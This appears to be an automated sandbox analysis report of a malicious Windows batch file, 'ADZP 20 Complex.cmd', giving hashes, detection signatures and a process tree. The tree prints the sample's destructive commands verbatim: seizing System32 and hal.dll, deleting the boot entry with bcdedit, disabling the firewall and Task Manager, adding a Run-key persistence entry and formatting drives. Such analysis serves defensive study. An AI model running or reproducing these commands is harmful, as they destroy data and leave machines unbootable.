bc46f8abc7da6b52a9ff6fff841c0ff989174f06cd1787d9fb55e0afbac1b77e

Analysis

max time kernel
18s
max time network
17s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
08-07-2024 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.cmd
Size

22KB
MD5

875e1190ed85a65570ee53a82a5cacb3
SHA1

8a6c6400eb74847dd4038eb086f1aceb695e2e25
SHA256

bc46f8abc7da6b52a9ff6fff841c0ff989174f06cd1787d9fb55e0afbac1b77e
SHA512

764f8faaeb71f297762be3a38ea340a9da5300eb7213ca03c803219f0496317b3d916648f8a6cac00f299be3bb69db268cf5e22b6ea2d01a6b233b341084466e
SSDEEP

384:2XJdAbrM21q0j0L1qEzdQ8PigfwTxX823JWo3yzKpMg:6bAUAW17JQrgodX/BMg

Score

8^/10

defense_evasion discovery evasion execution exploit persistence privilege_escalation upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1808	powershell.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 25 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6312	netsh.exe
7972	netsh.exe
10192	netsh.exe
11524	netsh.exe
3180	netsh.exe
8388	netsh.exe
2472	netsh.exe
6564	netsh.exe
1348	netsh.exe
7884	netsh.exe
11088	netsh.exe
10768	netsh.exe
2384	netsh.exe
1976	netsh.exe
3096	netsh.exe
3424	netsh.exe
6696	netsh.exe
5200	netsh.exe
6296	netsh.exe
6412	netsh.exe
6708	netsh.exe
10720	netsh.exe
12088	netsh.exe
6976	netsh.exe
8988	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
4024	takeown.exe
9460	icacls.exe
11796	Process not Found
12700	Process not Found
3172	icacls.exe
5656	takeown.exe
5844	icacls.exe
5824	icacls.exe
5332	takeown.exe
7012	icacls.exe
6876	takeown.exe
8512	takeown.exe
5476	icacls.exe
10888	icacls.exe
9516	takeown.exe
8296	icacls.exe
8312	icacls.exe
10648	takeown.exe
1964	takeown.exe
3784	icacls.exe
6096	takeown.exe
6424	takeown.exe
9132	takeown.exe
10748	Process not Found
1484	icacls.exe
2688	takeown.exe
3628	takeown.exe
7640	takeown.exe
11796	icacls.exe
1044	takeown.exe
324	icacls.exe
4940	icacls.exe
1420	icacls.exe
4988	takeown.exe
6492	icacls.exe
6792	takeown.exe
1600	icacls.exe
4624	takeown.exe
3888	takeown.exe
5448	takeown.exe
6892	takeown.exe
7072	icacls.exe
7420	takeown.exe
2472	takeown.exe
4444	takeown.exe
6600	icacls.exe
11104	takeown.exe
5864	icacls.exe
6580	icacls.exe
7288	takeown.exe
904	icacls.exe
2324	icacls.exe
2324	icacls.exe
6676	takeown.exe
1532	takeown.exe
7780	takeown.exe
2336	takeown.exe
6356	takeown.exe
5556	takeown.exe
9140	takeown.exe
9132	icacls.exe
5164	takeown.exe
6344	icacls.exe
6720	icacls.exe

Executes dropped EXE 1 IoCs

pid	Process
2544	Tasksvc.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5636	takeown.exe
8512	takeown.exe
6216	icacls.exe
6448	icacls.exe
2280	icacls.exe
1996	icacls.exe
5332	takeown.exe
1072	takeown.exe
4444	takeown.exe
7004	icacls.exe
7400	icacls.exe
4292	takeown.exe
12940	Process not Found
2604	takeown.exe
4968	takeown.exe
3628	takeown.exe
6092	takeown.exe
6856	takeown.exe
9256	icacls.exe
5568	takeown.exe
13284	Process not Found
2296	takeown.exe
2128	icacls.exe
6284	takeown.exe
6592	icacls.exe
6572	takeown.exe
10136	takeown.exe
9432	takeown.exe
13276	Process not Found
1420	icacls.exe
3196	icacls.exe
2948	takeown.exe
5576	icacls.exe
4940	icacls.exe
10888	icacls.exe
5556	takeown.exe
10468	Process not Found
5164	takeown.exe
5232	icacls.exe
10648	takeown.exe
5872	icacls.exe
11296	takeown.exe
8904	icacls.exe
1964	takeown.exe
2780	takeown.exe
1072	icacls.exe
5544	takeown.exe
6388	takeown.exe
7284	icacls.exe
9896	icacls.exe
10720	icacls.exe
4988	takeown.exe
5188	icacls.exe
5936	icacls.exe
6224	icacls.exe
6792	takeown.exe
7072	icacls.exe
5896	icacls.exe
5328	takeown.exe
5180	takeown.exe
6600	icacls.exe
7436	icacls.exe
10792	icacls.exe
1044	takeown.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a0000000160a8-240.dat	upx
behavioral1/memory/2544-251-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/2544-253-0x0000000000400000-0x000000000040E000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Run\Twain_20 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ADZP 20 Complex.cmd"	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 19 IoCs

pid	Process
1572	bcdedit.exe
1628	bcdedit.exe
1924	bcdedit.exe
1724	bcdedit.exe
2284	bcdedit.exe
4208	bcdedit.exe
4336	bcdedit.exe
6932	bcdedit.exe
6924	bcdedit.exe
6612	bcdedit.exe
7588	bcdedit.exe
7920	bcdedit.exe
7928	bcdedit.exe
6616	bcdedit.exe
9096	bcdedit.exe
8860	bcdedit.exe
11480	bcdedit.exe
11980	bcdedit.exe
12272	Process not Found

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\twain_32.dll	attrib.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Gathers network information 2 TTPs 19 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4304	ipconfig.exe
6300	ipconfig.exe
8128	ipconfig.exe
2888	ipconfig.exe
3836	ipconfig.exe
6932	ipconfig.exe
9240	ipconfig.exe
11884	ipconfig.exe
2668	ipconfig.exe
2568	ipconfig.exe
10400	Process not Found
12016	Process not Found
1696	ipconfig.exe
7856	ipconfig.exe
7868	ipconfig.exe
8088	ipconfig.exe
3828	ipconfig.exe
4572	ipconfig.exe
7392	ipconfig.exe

Modifies registry key 1 TTPs 50 IoCs

Modify Registry

T1112

pid	Process
7216	reg.exe
11352	reg.exe
7388	reg.exe
1956	reg.exe
7384	reg.exe
6320	reg.exe
10272	reg.exe
1612	reg.exe
6072	reg.exe
9556	reg.exe
8796	reg.exe
5872	reg.exe
7640	reg.exe
1980	reg.exe
2480	reg.exe
10604	reg.exe
4076	reg.exe
10612	reg.exe
2280	reg.exe
3632	reg.exe
7872	reg.exe
10188	reg.exe
2380	reg.exe
6424	reg.exe
6728	reg.exe
7428	reg.exe
3940	reg.exe
8616	reg.exe
6236	reg.exe
8032	reg.exe
5784	reg.exe
6404	reg.exe
6588	reg.exe
11068	reg.exe
6444	reg.exe
6356	reg.exe
3112	reg.exe
3968	reg.exe
6548	reg.exe
10472	reg.exe
1840	reg.exe
2236	reg.exe
324	reg.exe
2704	reg.exe
8312	reg.exe
10760	reg.exe
4036	reg.exe
6536	reg.exe
9472	reg.exe
10908	reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2544	Tasksvc.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1808	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1184	takeown.exe
Token: SeTakeOwnershipPrivilege	1872	takeown.exe
Token: SeTakeOwnershipPrivilege	2908	takeown.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeTakeOwnershipPrivilege	2336	takeown.exe
Token: SeTakeOwnershipPrivilege	2296	takeown.exe
Token: SeTakeOwnershipPrivilege	1720	takeown.exe
Token: SeTakeOwnershipPrivilege	1160	takeown.exe
Token: SeTakeOwnershipPrivilege	1996	takeown.exe
Token: SeTakeOwnershipPrivilege	1968	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 292 wrote to memory of 1948	292	cmd.exe	29
PID 292 wrote to memory of 1948	292	cmd.exe	29
PID 292 wrote to memory of 1948	292	cmd.exe	29
PID 292 wrote to memory of 2544	292	cmd.exe	30
PID 292 wrote to memory of 2544	292	cmd.exe	30
PID 292 wrote to memory of 2544	292	cmd.exe	30
PID 292 wrote to memory of 2544	292	cmd.exe	30
PID 292 wrote to memory of 1184	292	cmd.exe	32
PID 292 wrote to memory of 1184	292	cmd.exe	32
PID 292 wrote to memory of 1184	292	cmd.exe	32
PID 292 wrote to memory of 772	292	cmd.exe	33
PID 292 wrote to memory of 772	292	cmd.exe	33
PID 292 wrote to memory of 772	292	cmd.exe	33
PID 292 wrote to memory of 984	292	cmd.exe	34
PID 292 wrote to memory of 984	292	cmd.exe	34
PID 292 wrote to memory of 984	292	cmd.exe	34
PID 292 wrote to memory of 1872	292	cmd.exe	35
PID 292 wrote to memory of 1872	292	cmd.exe	35
PID 292 wrote to memory of 1872	292	cmd.exe	35
PID 292 wrote to memory of 1812	292	cmd.exe	36
PID 292 wrote to memory of 1812	292	cmd.exe	36
PID 292 wrote to memory of 1812	292	cmd.exe	36
PID 292 wrote to memory of 1868	292	cmd.exe	37
PID 292 wrote to memory of 1868	292	cmd.exe	37
PID 292 wrote to memory of 1868	292	cmd.exe	37
PID 292 wrote to memory of 2132	292	cmd.exe	40
PID 292 wrote to memory of 2132	292	cmd.exe	40
PID 292 wrote to memory of 2132	292	cmd.exe	40
PID 292 wrote to memory of 2140	292	cmd.exe	41
PID 292 wrote to memory of 2140	292	cmd.exe	41
PID 292 wrote to memory of 2140	292	cmd.exe	41
PID 292 wrote to memory of 1612	292	cmd.exe	42
PID 292 wrote to memory of 1612	292	cmd.exe	42
PID 292 wrote to memory of 1612	292	cmd.exe	42
PID 292 wrote to memory of 2380	292	cmd.exe	43
PID 292 wrote to memory of 2380	292	cmd.exe	43
PID 292 wrote to memory of 2380	292	cmd.exe	43
PID 292 wrote to memory of 2384	292	cmd.exe	217
PID 292 wrote to memory of 2384	292	cmd.exe	217
PID 292 wrote to memory of 2384	292	cmd.exe	217
PID 292 wrote to memory of 1572	292	cmd.exe	139
PID 292 wrote to memory of 1572	292	cmd.exe	139
PID 292 wrote to memory of 1572	292	cmd.exe	139
PID 292 wrote to memory of 1808	292	cmd.exe	46
PID 292 wrote to memory of 1808	292	cmd.exe	46
PID 292 wrote to memory of 1808	292	cmd.exe	46
PID 292 wrote to memory of 2192	292	cmd.exe	48
PID 292 wrote to memory of 2192	292	cmd.exe	48
PID 292 wrote to memory of 2192	292	cmd.exe	48
PID 292 wrote to memory of 2884	292	cmd.exe	50
PID 292 wrote to memory of 2884	292	cmd.exe	50
PID 292 wrote to memory of 2884	292	cmd.exe	50
PID 292 wrote to memory of 2888	292	cmd.exe	105
PID 292 wrote to memory of 2888	292	cmd.exe	105
PID 292 wrote to memory of 2888	292	cmd.exe	105
PID 292 wrote to memory of 1044	292	cmd.exe	374
PID 292 wrote to memory of 1044	292	cmd.exe	374
PID 292 wrote to memory of 1044	292	cmd.exe	374
PID 292 wrote to memory of 2564	292	cmd.exe	54
PID 292 wrote to memory of 2564	292	cmd.exe	54
PID 292 wrote to memory of 2564	292	cmd.exe	54
PID 292 wrote to memory of 1340	292	cmd.exe	55
PID 292 wrote to memory of 1340	292	cmd.exe	55
PID 292 wrote to memory of 1340	292	cmd.exe	55

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8036	attrib.exe
7856	attrib.exe
10088	attrib.exe
10648	attrib.exe
5568	attrib.exe
6400	attrib.exe
8156	attrib.exe
7912	attrib.exe
6964	attrib.exe
9676	attrib.exe
11096	attrib.exe
1840	attrib.exe
5484	attrib.exe
6508	attrib.exe
5920	attrib.exe
6864	attrib.exe
6808	attrib.exe
3596	attrib.exe
4828	attrib.exe
6572	attrib.exe
5412	attrib.exe
12080	attrib.exe
1868	attrib.exe
2216	attrib.exe
7076	attrib.exe
12452	Process not Found
5092	attrib.exe
6112	attrib.exe
10924	attrib.exe
7176	attrib.exe
9432	attrib.exe
592	attrib.exe
864	attrib.exe
6456	attrib.exe
2604	attrib.exe
1220	attrib.exe
8000	attrib.exe
7776	attrib.exe
10244	attrib.exe
1368	attrib.exe
2232	attrib.exe
2648	attrib.exe
1216	attrib.exe
3000	attrib.exe
5780	attrib.exe
2608	attrib.exe
6640	attrib.exe
8792	attrib.exe
3448	attrib.exe
5716	attrib.exe
5296	attrib.exe
6752	attrib.exe
9844	attrib.exe
11900	attrib.exe
1084	attrib.exe
2520	attrib.exe
1292	attrib.exe
4396	attrib.exe
7084	attrib.exe
8312	attrib.exe
984	attrib.exe
2716	attrib.exe
3096	attrib.exe
7376	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
1⤵
- Drops autorun.inf file
- Suspicious use of WriteProcessMemory
PID:292
- C:\Windows\system32\certutil.exe
  certutil -decode "Bytebeat.sk" "Tasksvc.exe"
  2⤵
  PID:1948
- C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
  "Tasksvc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2544
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\hal.dll"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1184
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\hal.dll" /reset /c /q
  2⤵
  PID:772
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\hal.dll"
  2⤵
  - Drops file in System32 directory
  - Views/modifies file attributes
  PID:984
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\Twain_32.dll"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\Twain_32.dll" /reset /c /q
  2⤵
  PID:1812
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\Twain_32.dll"
  2⤵
  - Drops file in Windows directory
  - Views/modifies file attributes
  PID:1868
- C:\Windows\system32\reg.exe
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
  2⤵
  - Adds Run key to start application
  PID:2132
- C:\Windows\system32\rundll32.exe
  rundll32 user32.dll, SwapMouseButton
  2⤵
  PID:2140
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1612
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2380
- C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:2384
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\Admin\AppData\Local\Temp\MouseMove.ps1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K Taskdl.bat
  2⤵
  PID:2192
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32" /r
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- C:\Windows\system32\wscript.exe
  WScript Informacion.vbs
  2⤵
  PID:2884
- C:\Windows\system32\ipconfig.exe
  ipconfig /release
  2⤵
  - Gathers network information
  PID:2888
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h *.*
  2⤵
  - Drops autorun.inf file
  PID:1044
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:2564
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1340
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:2180
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:268
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:2060
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1208
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1448
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:2772
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:2400
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2676
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    PID:1216
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    PID:2460
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    PID:1952
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    PID:1948
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2960
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2728
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1840
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1976
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:1972
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Modifies file permissions
      PID:2604
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:2460
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:1696
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:3000
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2268
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2232
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1980
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2236
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1216
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1956
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:992
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1984
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1640
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:2000
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Modifies file permissions
      PID:4968
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:5172
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:5200
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Modifies file permissions
      PID:5636
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:5936
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:6112
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:5512
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:4956
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:5872
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3632
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6296
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:6312
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:6488
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:6932
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      PID:7688
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8104
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:3832
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:3792
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:572
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:3408
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:3716
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:1940
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:6424
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:1936
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:3372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:7716
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:4716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:7624
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:6300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:6720
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:6368
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      Possible privilege escalation attempt
      PID:7640
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      PID:7592
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      Views/modifies file attributes
      PID:8000
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8396
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8440
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8488
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8548
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8588
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8644
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:8764
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:9968
  - - C:\Windows\system32\format.com
      format /y /q D:
      4⤵
      PID:11152
  - - C:\Windows\system32\format.com
      format /y /q E:
      4⤵
      PID:12180
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:2016
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3628
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:5188
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:5260
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:5728
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:6076
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:5132
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:5640
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:5088
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6072
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6236
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6412
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:7264
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
